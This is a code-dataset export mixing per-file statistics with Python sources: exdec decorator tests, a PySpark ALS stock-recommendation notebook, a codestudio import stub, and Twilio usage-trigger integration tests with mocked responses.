| 0.745394
| 0.723329
| 0.691635
| 0
| 0.043933
| 0.301799
| 44,533
| 870
| 151
| 51.187356
| 0.724214
| 0.04792
| 0
| 0.590595
| 0
| 0.001383
| 0.115175
| 0.001607
| 0
| 0
| 0
| 0.001149
| 0
| 0
| null | null | 0
| 0.02213
| null | null | 0.041494
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e3972322d31d71f22b69696cb73b5fb8eb925bf8
| 3,731
|
py
|
Python
|
tests/test_decorator_wrappers.py
|
EvgeniyBurdin/logdec
|
ae58d2e4744ebdfc1ea5cd20c24d04e230d015f1
|
[
"MIT"
] | 1
|
2021-10-11T06:31:56.000Z
|
2021-10-11T06:31:56.000Z
|
tests/test_decorator_wrappers.py
|
EvgeniyBurdin/logdec
|
ae58d2e4744ebdfc1ea5cd20c24d04e230d015f1
|
[
"MIT"
] | 2
|
2021-12-21T01:21:39.000Z
|
2021-12-21T10:51:41.000Z
|
tests/test_decorator_wrappers.py
|
EvgeniyBurdin/logdec
|
ae58d2e4744ebdfc1ea5cd20c24d04e230d015f1
|
[
"MIT"
] | 1
|
2021-12-21T01:22:06.000Z
|
2021-12-21T01:22:06.000Z
|
import asyncio
from exdec.data_classes import DecData
from exdec.decorator import _async_wrapper as async_wrapper
from exdec.decorator import _wrapper as wrapper
from exdec.decorator import dec_args0_is_func
class FakeManager:
    """Test double for the exdec manager: records which handlers ran.

    ``is_called`` maps handler name -> bool; the wrapper under test passes
    the handler name as ``fake_handler`` and this double just flips the
    corresponding flag.
    """

    def __init__(self):
        # Start every run with a clean call record.
        self.clear_handler_calls()

    def execute_handler(
        self, fake_handler: str, dec_data: DecData
    ):
        # Mark the named handler as having been invoked.
        self.is_called[fake_handler] = True

    async def async_execute_handler(
        self, fake_handler: str, dec_data: DecData
    ):
        # Async variant: identical bookkeeping to execute_handler.
        self.is_called[fake_handler] = True

    def clear_handler_calls(self):
        # Reset all known handler flags to "not called".
        self.is_called = dict.fromkeys(
            ("before_handler", "after_handler", "exc_handler"), False
        )
# Sentinel value returned by every well-behaved sample function below.
RESULT_FUNC = 555


def func():
    """Plain function that succeeds."""
    return RESULT_FUNC


async def async_func():
    """Coroutine that succeeds."""
    return RESULT_FUNC


def func_with_exception():
    """Plain function that raises ZeroDivisionError."""
    return 1 / 0


async def async_func_with_exception():
    """Coroutine that raises ZeroDivisionError."""
    return 1 / 0
def test_wrapper(dec_data: DecData):
    """Exercise the sync _wrapper: handler dispatch and result/exception
    bookkeeping on dec_data.func_info.

    NOTE(review): takes ``dec_data`` as a parameter — presumably a pytest
    fixture defined elsewhere (conftest); confirm.
    """
    fm = FakeManager()
    # Case 1: no before/after handlers registered — nothing dispatched.
    result = wrapper(func, dec_data, fm, None, None, "exc_handler")
    assert not fm.is_called["before_handler"]
    assert not fm.is_called["after_handler"]
    assert not fm.is_called["exc_handler"]
    assert dec_data.func_info.exception is None
    assert dec_data.func_info.result == RESULT_FUNC
    assert dec_data.func_info.result == result
    fm.clear_handler_calls()
    # Case 2: before/after handlers registered and the call succeeds.
    result = wrapper(
        func, dec_data, fm, "before_handler", "after_handler", "exc_handler"
    )
    assert fm.is_called["before_handler"]
    assert fm.is_called["after_handler"]
    assert not fm.is_called["exc_handler"]
    assert dec_data.func_info.exception is None
    assert dec_data.func_info.result == RESULT_FUNC
    assert dec_data.func_info.result == result
    fm.clear_handler_calls()
    # Case 3: the wrapped function raises — only exc_handler runs and the
    # result stays None while the exception is recorded.
    result = wrapper(
        func_with_exception, dec_data, fm, None, None, "exc_handler"
    )
    assert not fm.is_called["before_handler"]
    assert not fm.is_called["after_handler"]
    assert fm.is_called["exc_handler"]
    assert isinstance(dec_data.func_info.exception, ZeroDivisionError)
    assert dec_data.func_info.result is None
    assert dec_data.func_info.result == result
def test_async_wrapper(dec_data: DecData):
    """Async counterpart of test_wrapper: the same three scenarios driven
    through asyncio.run().

    NOTE(review): ``dec_data`` is presumably a pytest fixture defined
    elsewhere (conftest); confirm.
    """
    fm = FakeManager()
    # Case 1: no before/after handlers registered — nothing dispatched.
    result = asyncio.run(async_wrapper(
        async_func, dec_data, fm, None, None, "exc_handler"
    ))
    assert not fm.is_called["before_handler"]
    assert not fm.is_called["after_handler"]
    assert not fm.is_called["exc_handler"]
    assert dec_data.func_info.exception is None
    assert dec_data.func_info.result == RESULT_FUNC
    assert dec_data.func_info.result == result
    fm.clear_handler_calls()
    # Case 2: before/after handlers registered and the call succeeds.
    result = asyncio.run(async_wrapper(
        async_func, dec_data, fm,
        "before_handler", "after_handler", "exc_handler"
    ))
    assert fm.is_called["before_handler"]
    assert fm.is_called["after_handler"]
    assert not fm.is_called["exc_handler"]
    assert dec_data.func_info.exception is None
    assert dec_data.func_info.result == RESULT_FUNC
    assert dec_data.func_info.result == result
    fm.clear_handler_calls()
    # Case 3: the wrapped coroutine raises — only exc_handler runs.
    result = asyncio.run(async_wrapper(
        async_func_with_exception, dec_data, fm, None, None, "exc_handler"
    ))
    assert not fm.is_called["before_handler"]
    assert not fm.is_called["after_handler"]
    assert fm.is_called["exc_handler"]
    assert isinstance(dec_data.func_info.exception, ZeroDivisionError)
    assert dec_data.func_info.result is None
    assert dec_data.func_info.result == result
def test_dec_args0_is_func(func):
    """dec_args0_is_func is true only when the first decorator argument is
    a function.

    NOTE(review): the ``func`` parameter shadows the module-level ``func``
    — presumably a pytest fixture; confirm in conftest.
    """
    assert dec_args0_is_func(dec_args=(func, ))
    assert not dec_args0_is_func(dec_args=tuple())
    assert not dec_args0_is_func(dec_args=(Exception, ))
| 27.843284
| 76
| 0.712142
| 527
| 3,731
| 4.717268
| 0.094877
| 0.078842
| 0.072405
| 0.108608
| 0.838697
| 0.813757
| 0.782381
| 0.752615
| 0.728479
| 0.728479
| 0
| 0.004001
| 0.196194
| 3,731
| 133
| 77
| 28.052632
| 0.824942
| 0
| 0
| 0.625
| 0
| 0
| 0.103458
| 0
| 0
| 0
| 0
| 0
| 0.40625
| 1
| 0.083333
| false
| 0
| 0.052083
| 0.020833
| 0.1875
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e3c33c341bd842ddf6006554465eae9baf66938e
| 6,039
|
py
|
Python
|
recengine/back-end/Recommendation.py
|
sjayakum/recengine
|
ca0dd1c122c1c6af75757300f552740ae2f72723
|
[
"Apache-2.0"
] | null | null | null |
recengine/back-end/Recommendation.py
|
sjayakum/recengine
|
ca0dd1c122c1c6af75757300f552740ae2f72723
|
[
"Apache-2.0"
] | null | null | null |
recengine/back-end/Recommendation.py
|
sjayakum/recengine
|
ca0dd1c122c1c6af75757300f552740ae2f72723
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
# In[1]:
from test_helper import Test
import os.path
def myMapingFunction(x):
    # Parse one CSV line of the stock file: encode to a byte string and
    # split on commas, keeping columns 1..40 (drops the leading member-id
    # column and anything past the 40 rating columns).
    # NOTE(review): Python 2 semantics — under Python 3, str.encode()
    # returns bytes and bytes.split(",") raises TypeError.
    y = x.encode('utf8').split(",")
    return y[1:41]
# --- Exported notebook cells (Python 2 / PySpark): load, transform, train,
# evaluate and inspect.  Relies on a pre-existing SparkContext ``sc``. ---
rootDir = os.path.join('data')
inputFilePath = os.path.join('stock.csv')
stockFileName = os.path.join(rootDir,inputFilePath)
numPartitions = 2
rawData = sc.textFile(stockFileName,numPartitions)
totalPoints = rawData.count()
print totalPoints
sampleData = rawData.take(5)
#print sampleData
newRawData = rawData.map(myMapingFunction)
print len(newRawData.take(1)[0])
print newRawData.take(5)
# In[2]:
#TRANSFORM THE DATA
# Build (member_id, stock_index, rating) triples; a raw value of 99 means
# "no rating" and is mapped to 0.0.
transformedList = []
likingList = newRawData.collect()
memid = 1
while memid < 24000:
    i = 0
    global transformedList
    while i < 40:
        if(float(likingList[memid][i])==99):
            transformedList.append((memid,i,0.0))
        else:
            transformedList.append((memid,i,int(float(likingList[memid][i]))))
        i = i + 1
    memid = memid + 1
print transformedList[0:40]
# In[4]:
transData = sc.parallelize(transformedList)
print transData
print transData.count()
print transData.take(2)
# In[6]:
#BUILDING THE MODEL
from pyspark.mllib.recommendation import ALS, MatrixFactorizationModel, Rating
# 80/20 train/test split with a fixed seed of 17.
trainingDataSet, testDataSet = transData.randomSplit([8, 2], 17)
# Build the recommendation model using Alternating Least Squares
rank = 5
numIterations = 5
model = ALS.train(trainingDataSet, rank, numIterations)
# In[38]:
# Evaluate the model on training data
#EXTRACT ONLY (MEMBERID,STOCKID)
testDataSetModified = testDataSet.map(lambda p:(p[0],p[1]))
#PREDICT
predictedData = model.predictAll(testDataSetModified).map(lambda r: ((r[0], r[1]), r[2]))
# NOTE(review): the join is against transData (all ratings), not just the
# held-out testDataSet — the reported RMSE therefore mixes train and test.
ratingsAndPredictions = transData.map(lambda r: ((r[0], r[1]), r[2])).join(predictedData)
MSE = ratingsAndPredictions.map(lambda r: (r[1][0] - r[1][1])**2).mean()
print("Root Mean Squared Error = " + str(MSE**0.5))
# In[64]:
### print newRawData.take(30)[25][7]
print newRawData.take(30)[25]
# Plot actual vs predicted ratings for one member.
plotActualData = []
loopThroughData = newRawData.take(40)[30]
for x in loopThroughData:
    if float(x) == 99:
        plotActualData.append(0)
    else:
        plotActualData.append(int(float(x)))
plotPredictedData = []
k = 0
while (k<40):
    plotPredictedData.append(int(model.predict(30,k)))
    k = k + 1
import matplotlib.pyplot as plt
plt.plot(range(40),plotActualData,label='actual')
plt.plot(range(40),plotPredictedData,label='predicted')
plt.show()
# In[65]:
print plotActualData[23]
print plotPredictedData[23]
# In[76]:
# Print all positive predictions for member 23.
y = 0
print "stkno"+"\t"+ "howmuch"
while y<40:
    temp = int(model.predict(23,y))
    if temp > 0:
        print str(y)+"\t"+str(temp)
    y = y+1
# In[4]:
print rawData.take(2)
# In[7]:
from test_helper import Test
import os.path
from pyspark.mllib.recommendation import ALS, MatrixFactorizationModel, Rating
transformedList = []
transData = 0
newRawData = 0
model = 0
def myMapingFunction(x):
    # Parse one CSV line of the stock file: encode to a byte string and
    # split on commas, keeping columns 1..40 (drops the leading member-id
    # column).  Duplicate of the definition in the notebook cells above.
    y = x.encode('utf8').split(",")
    return y[1:41]
def LoadData():
    # Read data/stock.csv into an RDD, map each line to its 40 rating
    # columns, and store the result in the module-global ``newRawData``.
    # Requires a SparkContext bound to the global name ``sc``.
    global newRawData
    rootDir = os.path.join('data')
    inputFilePath = os.path.join('stock.csv')
    stockFileName = os.path.join(rootDir,inputFilePath)
    numPartitions = 2
    rawData = sc.textFile(stockFileName,numPartitions)
    totalPoints = rawData.count()
    print totalPoints
    #sampleData = rawData.take(5)
    #print sampleData
    newRawData = rawData.map(myMapingFunction)
    #print len(newRawData.take(1)[0])
    #print newRawData.take(5)
def ReduceAndTransfromData():
    #TRANSFORM THE DATA
    # Turn the collected rating rows into (member_id, stock_index, rating)
    # triples and parallelize them into the module-global ``transData``.
    # A raw value of 99 means "no rating" and is stored as 0.0.
    # NOTE(review): ``transformedList`` is a module-level list that is never
    # cleared here — calling this function twice appends duplicate triples.
    global transData
    likingList = newRawData.collect()
    memid = 1
    while memid < 24000:
        i = 0
        global transformedList
        while i < 40:
            if(float(likingList[memid][i])==99):
                transformedList.append((memid,i,0.0))
            else:
                transformedList.append((memid,i,int(float(likingList[memid][i]))))
            i = i + 1
        memid = memid + 1
    #print transformedList[0:40]
    transData = sc.parallelize(transformedList)
    #print transData
    #print transData.count()
    #print transData.take(2)
#BUILDING THE MODEL
def makeModel():
    # Train an ALS recommendation model on an 80/20 split (seed 17) of the
    # module-global ``transData`` and print the resulting RMSE.  Stores the
    # trained model in the module-global ``model``.
    global model
    global transData
    trainingDataSet, testDataSet = transData.randomSplit([8, 2], 17)
    # Build the recommendation model using Alternating Least Squares
    rank = 5
    numIterations = 5
    model = ALS.train(trainingDataSet, rank, numIterations)
    # Evaluate the model on training data
    #EXTRACT ONLY (MEMBERID,STOCKID)
    testDataSetModified = testDataSet.map(lambda p:(p[0],p[1]))
    #PREDICT
    predictedData = model.predictAll(testDataSetModified).map(lambda r: ((r[0], r[1]), r[2]))
    # NOTE(review): joined against transData (all ratings) rather than the
    # held-out test split, so the reported RMSE mixes train and test data.
    ratingsAndPredictions = transData.map(lambda r: ((r[0], r[1]), r[2])).join(predictedData)
    MSE = ratingsAndPredictions.map(lambda r: (r[1][0] - r[1][1])**2).mean()
    print("Root Mean Squared Error = " + str(MSE**0.5))
def getPredictions(memid):
y = 0
tempList = []
print "stkno"+"\t"+ "howmuch"
while y<40:
temp = int(model.predict(23,y))
if temp > 0:
tempList.append(temp)
print str(y)+"\t"+str(temp)
y = y+1
return tempList
def getRecommendation(memid):
    """Compute (and print) stock recommendations for member ``memid``.

    BUGFIX: the original discarded getPredictions' return value, so callers
    got None.  Returning the list of positive predictions is backward
    compatible — existing callers that ignored the result are unaffected.
    """
    return getPredictions(memid)
def makeModelReady():
    # Full pipeline: load the raw CSV, build the (member, stock, rating)
    # triples, then train and evaluate the ALS model.
    LoadData()
    ReduceAndTransfromData()
    makeModel()
# Run the full pipeline once, then query recommendations for two members.
makeModelReady()
getRecommendation(30)
# In[8]:
getRecommendation(29)
# In[ ]:
### print newRawData.take(30)[25][7]
print newRawData.take(30)[25]
# Plot actual vs predicted ratings for member 30 (duplicate of the earlier
# notebook cell).
plotActualData = []
loopThroughData = newRawData.take(40)[30]
for x in loopThroughData:
    if float(x) == 99:
        plotActualData.append(0)
    else:
        plotActualData.append(int(float(x)))
plotPredictedData = []
k = 0
while (k<40):
    plotPredictedData.append(int(model.predict(30,k)))
    k = k + 1
import matplotlib.pyplot as plt
plt.plot(range(40),plotActualData,label='actual')
plt.plot(range(40),plotPredictedData,label='predicted')
plt.show()
print plotActualData[23]
print plotPredictedData[23]
| 19.110759
| 93
| 0.661699
| 756
| 6,039
| 5.283069
| 0.183862
| 0.035053
| 0.015023
| 0.016525
| 0.872308
| 0.872308
| 0.849775
| 0.849775
| 0.797196
| 0.787181
| 0
| 0.040546
| 0.199536
| 6,039
| 315
| 94
| 19.171429
| 0.785685
| 0.118728
| 0
| 0.815287
| 0
| 0
| 0.028425
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.050955
| null | null | 0.133758
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
540e7471bee2dba8d346942aab7226385c06ccb5
| 137
|
py
|
Python
|
tests/codestudio_tests.py
|
xenomorff/code-dot-org-python
|
7b35999dc35fa9ca13c683f43eca631dc92e5da4
|
[
"Unlicense"
] | null | null | null |
tests/codestudio_tests.py
|
xenomorff/code-dot-org-python
|
7b35999dc35fa9ca13c683f43eca631dc92e5da4
|
[
"Unlicense"
] | null | null | null |
tests/codestudio_tests.py
|
xenomorff/code-dot-org-python
|
7b35999dc35fa9ca13c683f43eca631dc92e5da4
|
[
"Unlicense"
] | null | null | null |
import sys
sys.path.append('..')
import codestudio.artist as a
from nose.tools import assert_equals
from nose.tools import assert_raises
| 22.833333
| 36
| 0.810219
| 22
| 137
| 4.954545
| 0.636364
| 0.146789
| 0.238532
| 0.348624
| 0.458716
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.109489
| 137
| 5
| 37
| 27.4
| 0.893443
| 0
| 0
| 0
| 0
| 0
| 0.014599
| 0
| 0
| 0
| 0
| 0
| 0.4
| 1
| 0
| true
| 0
| 0.8
| 0
| 0.8
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
540fcb149f2754fc495fb016301d30b0b8615edf
| 11,366
|
py
|
Python
|
SpoTwillio/lib/python3.6/site-packages/tests/integration/api/v2010/account/usage/test_trigger.py
|
Natfan/funlittlethings
|
80d5378b45b5c0ead725942ee50403bd057514a6
|
[
"MIT"
] | 3
|
2019-11-12T07:55:51.000Z
|
2020-04-01T11:19:18.000Z
|
SpoTwillio/lib/python3.6/site-packages/tests/integration/api/v2010/account/usage/test_trigger.py
|
Natfan/funlittlethings
|
80d5378b45b5c0ead725942ee50403bd057514a6
|
[
"MIT"
] | 7
|
2020-06-06T01:06:19.000Z
|
2022-02-10T11:15:14.000Z
|
SpoTwillio/lib/python3.6/site-packages/tests/integration/api/v2010/account/usage/test_trigger.py
|
Natfan/funlittlethings
|
80d5378b45b5c0ead725942ee50403bd057514a6
|
[
"MIT"
] | 2
|
2019-10-20T14:54:47.000Z
|
2020-06-11T07:29:37.000Z
|
# coding=utf-8
"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from tests import IntegrationTestCase
from tests.holodeck import Request
from twilio.base.exceptions import TwilioException
from twilio.http.response import Response
class TriggerTestCase(IntegrationTestCase):
    """Integration tests for the Twilio /Usage/Triggers REST resource.

    Auto-generated pattern: each *_request test mocks a 500 response so the
    call raises TwilioException, then asserts the exact HTTP request that
    was sent; each *_response test mocks a canned JSON payload and asserts
    the client parses it into a non-None object.
    """

    def test_fetch_request(self):
        # fetch() must GET /Usage/Triggers/<sid>.json under the account.
        self.holodeck.mock(Response(500, ''))
        with self.assertRaises(TwilioException):
            self.client.api.v2010.accounts(sid="ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") \
                .usage \
                .triggers(sid="UTaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa").fetch()
        self.holodeck.assert_has_request(Request(
            'get',
            'https://api.twilio.com/2010-04-01/Accounts/ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Usage/Triggers/UTaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.json',
        ))

    def test_fetch_response(self):
        # A 200 with a full trigger payload parses into a non-None object.
        self.holodeck.mock(Response(
            200,
            '''
            {
                "account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
                "api_version": "2010-04-01",
                "callback_method": "GET",
                "callback_url": "http://cap.com/streetfight",
                "current_value": "0",
                "date_created": "Sun, 06 Sep 2015 12:58:45 +0000",
                "date_fired": null,
                "date_updated": "Sun, 06 Sep 2015 12:58:45 +0000",
                "friendly_name": "raphael-cluster-1441544325.86",
                "recurring": "yearly",
                "sid": "UTaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
                "trigger_by": "price",
                "trigger_value": "50",
                "uri": "/2010-04-01/Accounts/ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Usage/Triggers/UTaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
                "usage_category": "totalprice",
                "usage_record_uri": "/2010-04-01/Accounts/ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Usage/Records?Category=totalprice"
            }
            '''
        ))
        actual = self.client.api.v2010.accounts(sid="ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") \
            .usage \
            .triggers(sid="UTaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa").fetch()
        self.assertIsNotNone(actual)

    def test_update_request(self):
        # update() must POST to the trigger instance URL.
        self.holodeck.mock(Response(500, ''))
        with self.assertRaises(TwilioException):
            self.client.api.v2010.accounts(sid="ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") \
                .usage \
                .triggers(sid="UTaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa").update()
        self.holodeck.assert_has_request(Request(
            'post',
            'https://api.twilio.com/2010-04-01/Accounts/ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Usage/Triggers/UTaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.json',
        ))

    def test_update_response(self):
        # A 200 with a trigger payload parses into a non-None object.
        self.holodeck.mock(Response(
            200,
            '''
            {
                "account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
                "api_version": "2010-04-01",
                "callback_method": "GET",
                "callback_url": "http://cap.com/streetfight",
                "current_value": "0",
                "date_created": "Sun, 06 Sep 2015 12:58:45 +0000",
                "date_fired": null,
                "date_updated": "Sun, 06 Sep 2015 12:58:45 +0000",
                "friendly_name": "raphael-cluster-1441544325.86",
                "recurring": "yearly",
                "sid": "UTaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
                "trigger_by": "price",
                "trigger_value": "50",
                "uri": "/2010-04-01/Accounts/ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Usage/Triggers/UTaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
                "usage_category": "totalprice",
                "usage_record_uri": "/2010-04-01/Accounts/ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Usage/Records?Category=totalprice"
            }
            '''
        ))
        actual = self.client.api.v2010.accounts(sid="ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") \
            .usage \
            .triggers(sid="UTaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa").update()
        self.assertIsNotNone(actual)

    def test_delete_request(self):
        # delete() must issue DELETE on the trigger instance URL.
        self.holodeck.mock(Response(500, ''))
        with self.assertRaises(TwilioException):
            self.client.api.v2010.accounts(sid="ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") \
                .usage \
                .triggers(sid="UTaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa").delete()
        self.holodeck.assert_has_request(Request(
            'delete',
            'https://api.twilio.com/2010-04-01/Accounts/ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Usage/Triggers/UTaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.json',
        ))

    def test_delete_response(self):
        # A 204 with no body means the delete succeeded (truthy result).
        self.holodeck.mock(Response(
            204,
            None,
        ))
        actual = self.client.api.v2010.accounts(sid="ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") \
            .usage \
            .triggers(sid="UTaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa").delete()
        self.assertTrue(actual)

    def test_create_request(self):
        # create() must POST the form-encoded trigger parameters to the
        # collection URL.
        self.holodeck.mock(Response(500, ''))
        with self.assertRaises(TwilioException):
            self.client.api.v2010.accounts(sid="ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") \
                .usage \
                .triggers.create(callback_url="https://example.com", trigger_value="trigger_value", usage_category="authy-authentications")
        values = {
            'CallbackUrl': "https://example.com",
            'TriggerValue': "trigger_value",
            'UsageCategory': "authy-authentications",
        }
        self.holodeck.assert_has_request(Request(
            'post',
            'https://api.twilio.com/2010-04-01/Accounts/ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Usage/Triggers.json',
            data=values,
        ))

    def test_create_response(self):
        # A 201 with a trigger payload parses into a non-None object.
        self.holodeck.mock(Response(
            201,
            '''
            {
                "account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
                "api_version": "2010-04-01",
                "callback_method": "GET",
                "callback_url": "http://cap.com/streetfight",
                "current_value": "0",
                "date_created": "Sun, 06 Sep 2015 12:58:45 +0000",
                "date_fired": null,
                "date_updated": "Sun, 06 Sep 2015 12:58:45 +0000",
                "friendly_name": "raphael-cluster-1441544325.86",
                "recurring": "yearly",
                "sid": "UTaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
                "trigger_by": "price",
                "trigger_value": "50",
                "uri": "/2010-04-01/Accounts/ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Usage/Triggers/UTaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
                "usage_category": "totalprice",
                "usage_record_uri": "/2010-04-01/Accounts/ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Usage/Records?Category=totalprice"
            }
            '''
        ))
        actual = self.client.api.v2010.accounts(sid="ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") \
            .usage \
            .triggers.create(callback_url="https://example.com", trigger_value="trigger_value", usage_category="authy-authentications")
        self.assertIsNotNone(actual)

    def test_list_request(self):
        # list() must GET the collection URL.
        self.holodeck.mock(Response(500, ''))
        with self.assertRaises(TwilioException):
            self.client.api.v2010.accounts(sid="ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") \
                .usage \
                .triggers.list()
        self.holodeck.assert_has_request(Request(
            'get',
            'https://api.twilio.com/2010-04-01/Accounts/ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Usage/Triggers.json',
        ))

    def test_read_full_response(self):
        # A paged payload with one trigger record parses successfully.
        self.holodeck.mock(Response(
            200,
            '''
            {
                "end": 0,
                "first_page_uri": "/2010-04-01/Accounts/ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Usage/Triggers?PageSize=1&Page=0",
                "last_page_uri": "/2010-04-01/Accounts/ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Usage/Triggers?PageSize=1&Page=626",
                "next_page_uri": null,
                "num_pages": 627,
                "page": 0,
                "page_size": 1,
                "previous_page_uri": null,
                "start": 0,
                "total": 627,
                "uri": "/2010-04-01/Accounts/ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Usage/Triggers",
                "usage_triggers": [
                    {
                        "account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
                        "api_version": "2010-04-01",
                        "callback_method": "GET",
                        "callback_url": "http://cap.com/streetfight",
                        "current_value": "0",
                        "date_created": "Sun, 06 Sep 2015 12:58:45 +0000",
                        "date_fired": null,
                        "date_updated": "Sun, 06 Sep 2015 12:58:45 +0000",
                        "friendly_name": "raphael-cluster-1441544325.86",
                        "recurring": "yearly",
                        "sid": "UTaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
                        "trigger_by": "price",
                        "trigger_value": "50",
                        "uri": "/2010-04-01/Accounts/ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Usage/Triggers/UTaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
                        "usage_category": "totalprice",
                        "usage_record_uri": "/2010-04-01/Accounts/ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Usage/Records?Category=totalprice"
                    }
                ]
            }
            '''
        ))
        actual = self.client.api.v2010.accounts(sid="ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") \
            .usage \
            .triggers.list()
        self.assertIsNotNone(actual)

    def test_read_empty_response(self):
        # An empty "usage_triggers" page still parses into a non-None list.
        self.holodeck.mock(Response(
            200,
            '''
            {
                "end": 0,
                "first_page_uri": "/2010-04-01/Accounts/ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Usage/Triggers?PageSize=1&Page=0",
                "last_page_uri": "/2010-04-01/Accounts/ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Usage/Triggers?PageSize=1&Page=626",
                "next_page_uri": null,
                "num_pages": 627,
                "page": 0,
                "page_size": 1,
                "previous_page_uri": null,
                "start": 0,
                "total": 627,
                "uri": "/2010-04-01/Accounts/ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Usage/Triggers",
                "usage_triggers": []
            }
            '''
        ))
        actual = self.client.api.v2010.accounts(sid="ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") \
            .usage \
            .triggers.list()
        self.assertIsNotNone(actual)
| 42.729323
| 161
| 0.545311
| 903
| 11,366
| 6.719823
| 0.139535
| 0.192815
| 0.201384
| 0.050099
| 0.9265
| 0.910844
| 0.893869
| 0.893869
| 0.893869
| 0.893869
| 0
| 0.064512
| 0.338554
| 11,366
| 265
| 162
| 42.890566
| 0.742618
| 0.00959
| 0
| 0.754545
| 1
| 0.045455
| 0.246042
| 0.114037
| 0
| 0
| 0
| 0
| 0.145455
| 1
| 0.1
| false
| 0
| 0.036364
| 0
| 0.145455
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
541449afb8024b9df5dc0a7351dccf3d67f8a70e
| 10,897
|
py
|
Python
|
backbones/__init__.py
|
okojoalg/raft-mlp
|
6060d5d95e142acf80cea6d180adfb075cbe87d0
|
[
"Apache-2.0"
] | 20
|
2021-08-11T06:06:16.000Z
|
2022-03-25T12:34:08.000Z
|
backbones/__init__.py
|
okojoalg/raft-mlp
|
6060d5d95e142acf80cea6d180adfb075cbe87d0
|
[
"Apache-2.0"
] | null | null | null |
backbones/__init__.py
|
okojoalg/raft-mlp
|
6060d5d95e142acf80cea6d180adfb075cbe87d0
|
[
"Apache-2.0"
] | 4
|
2021-08-12T01:07:17.000Z
|
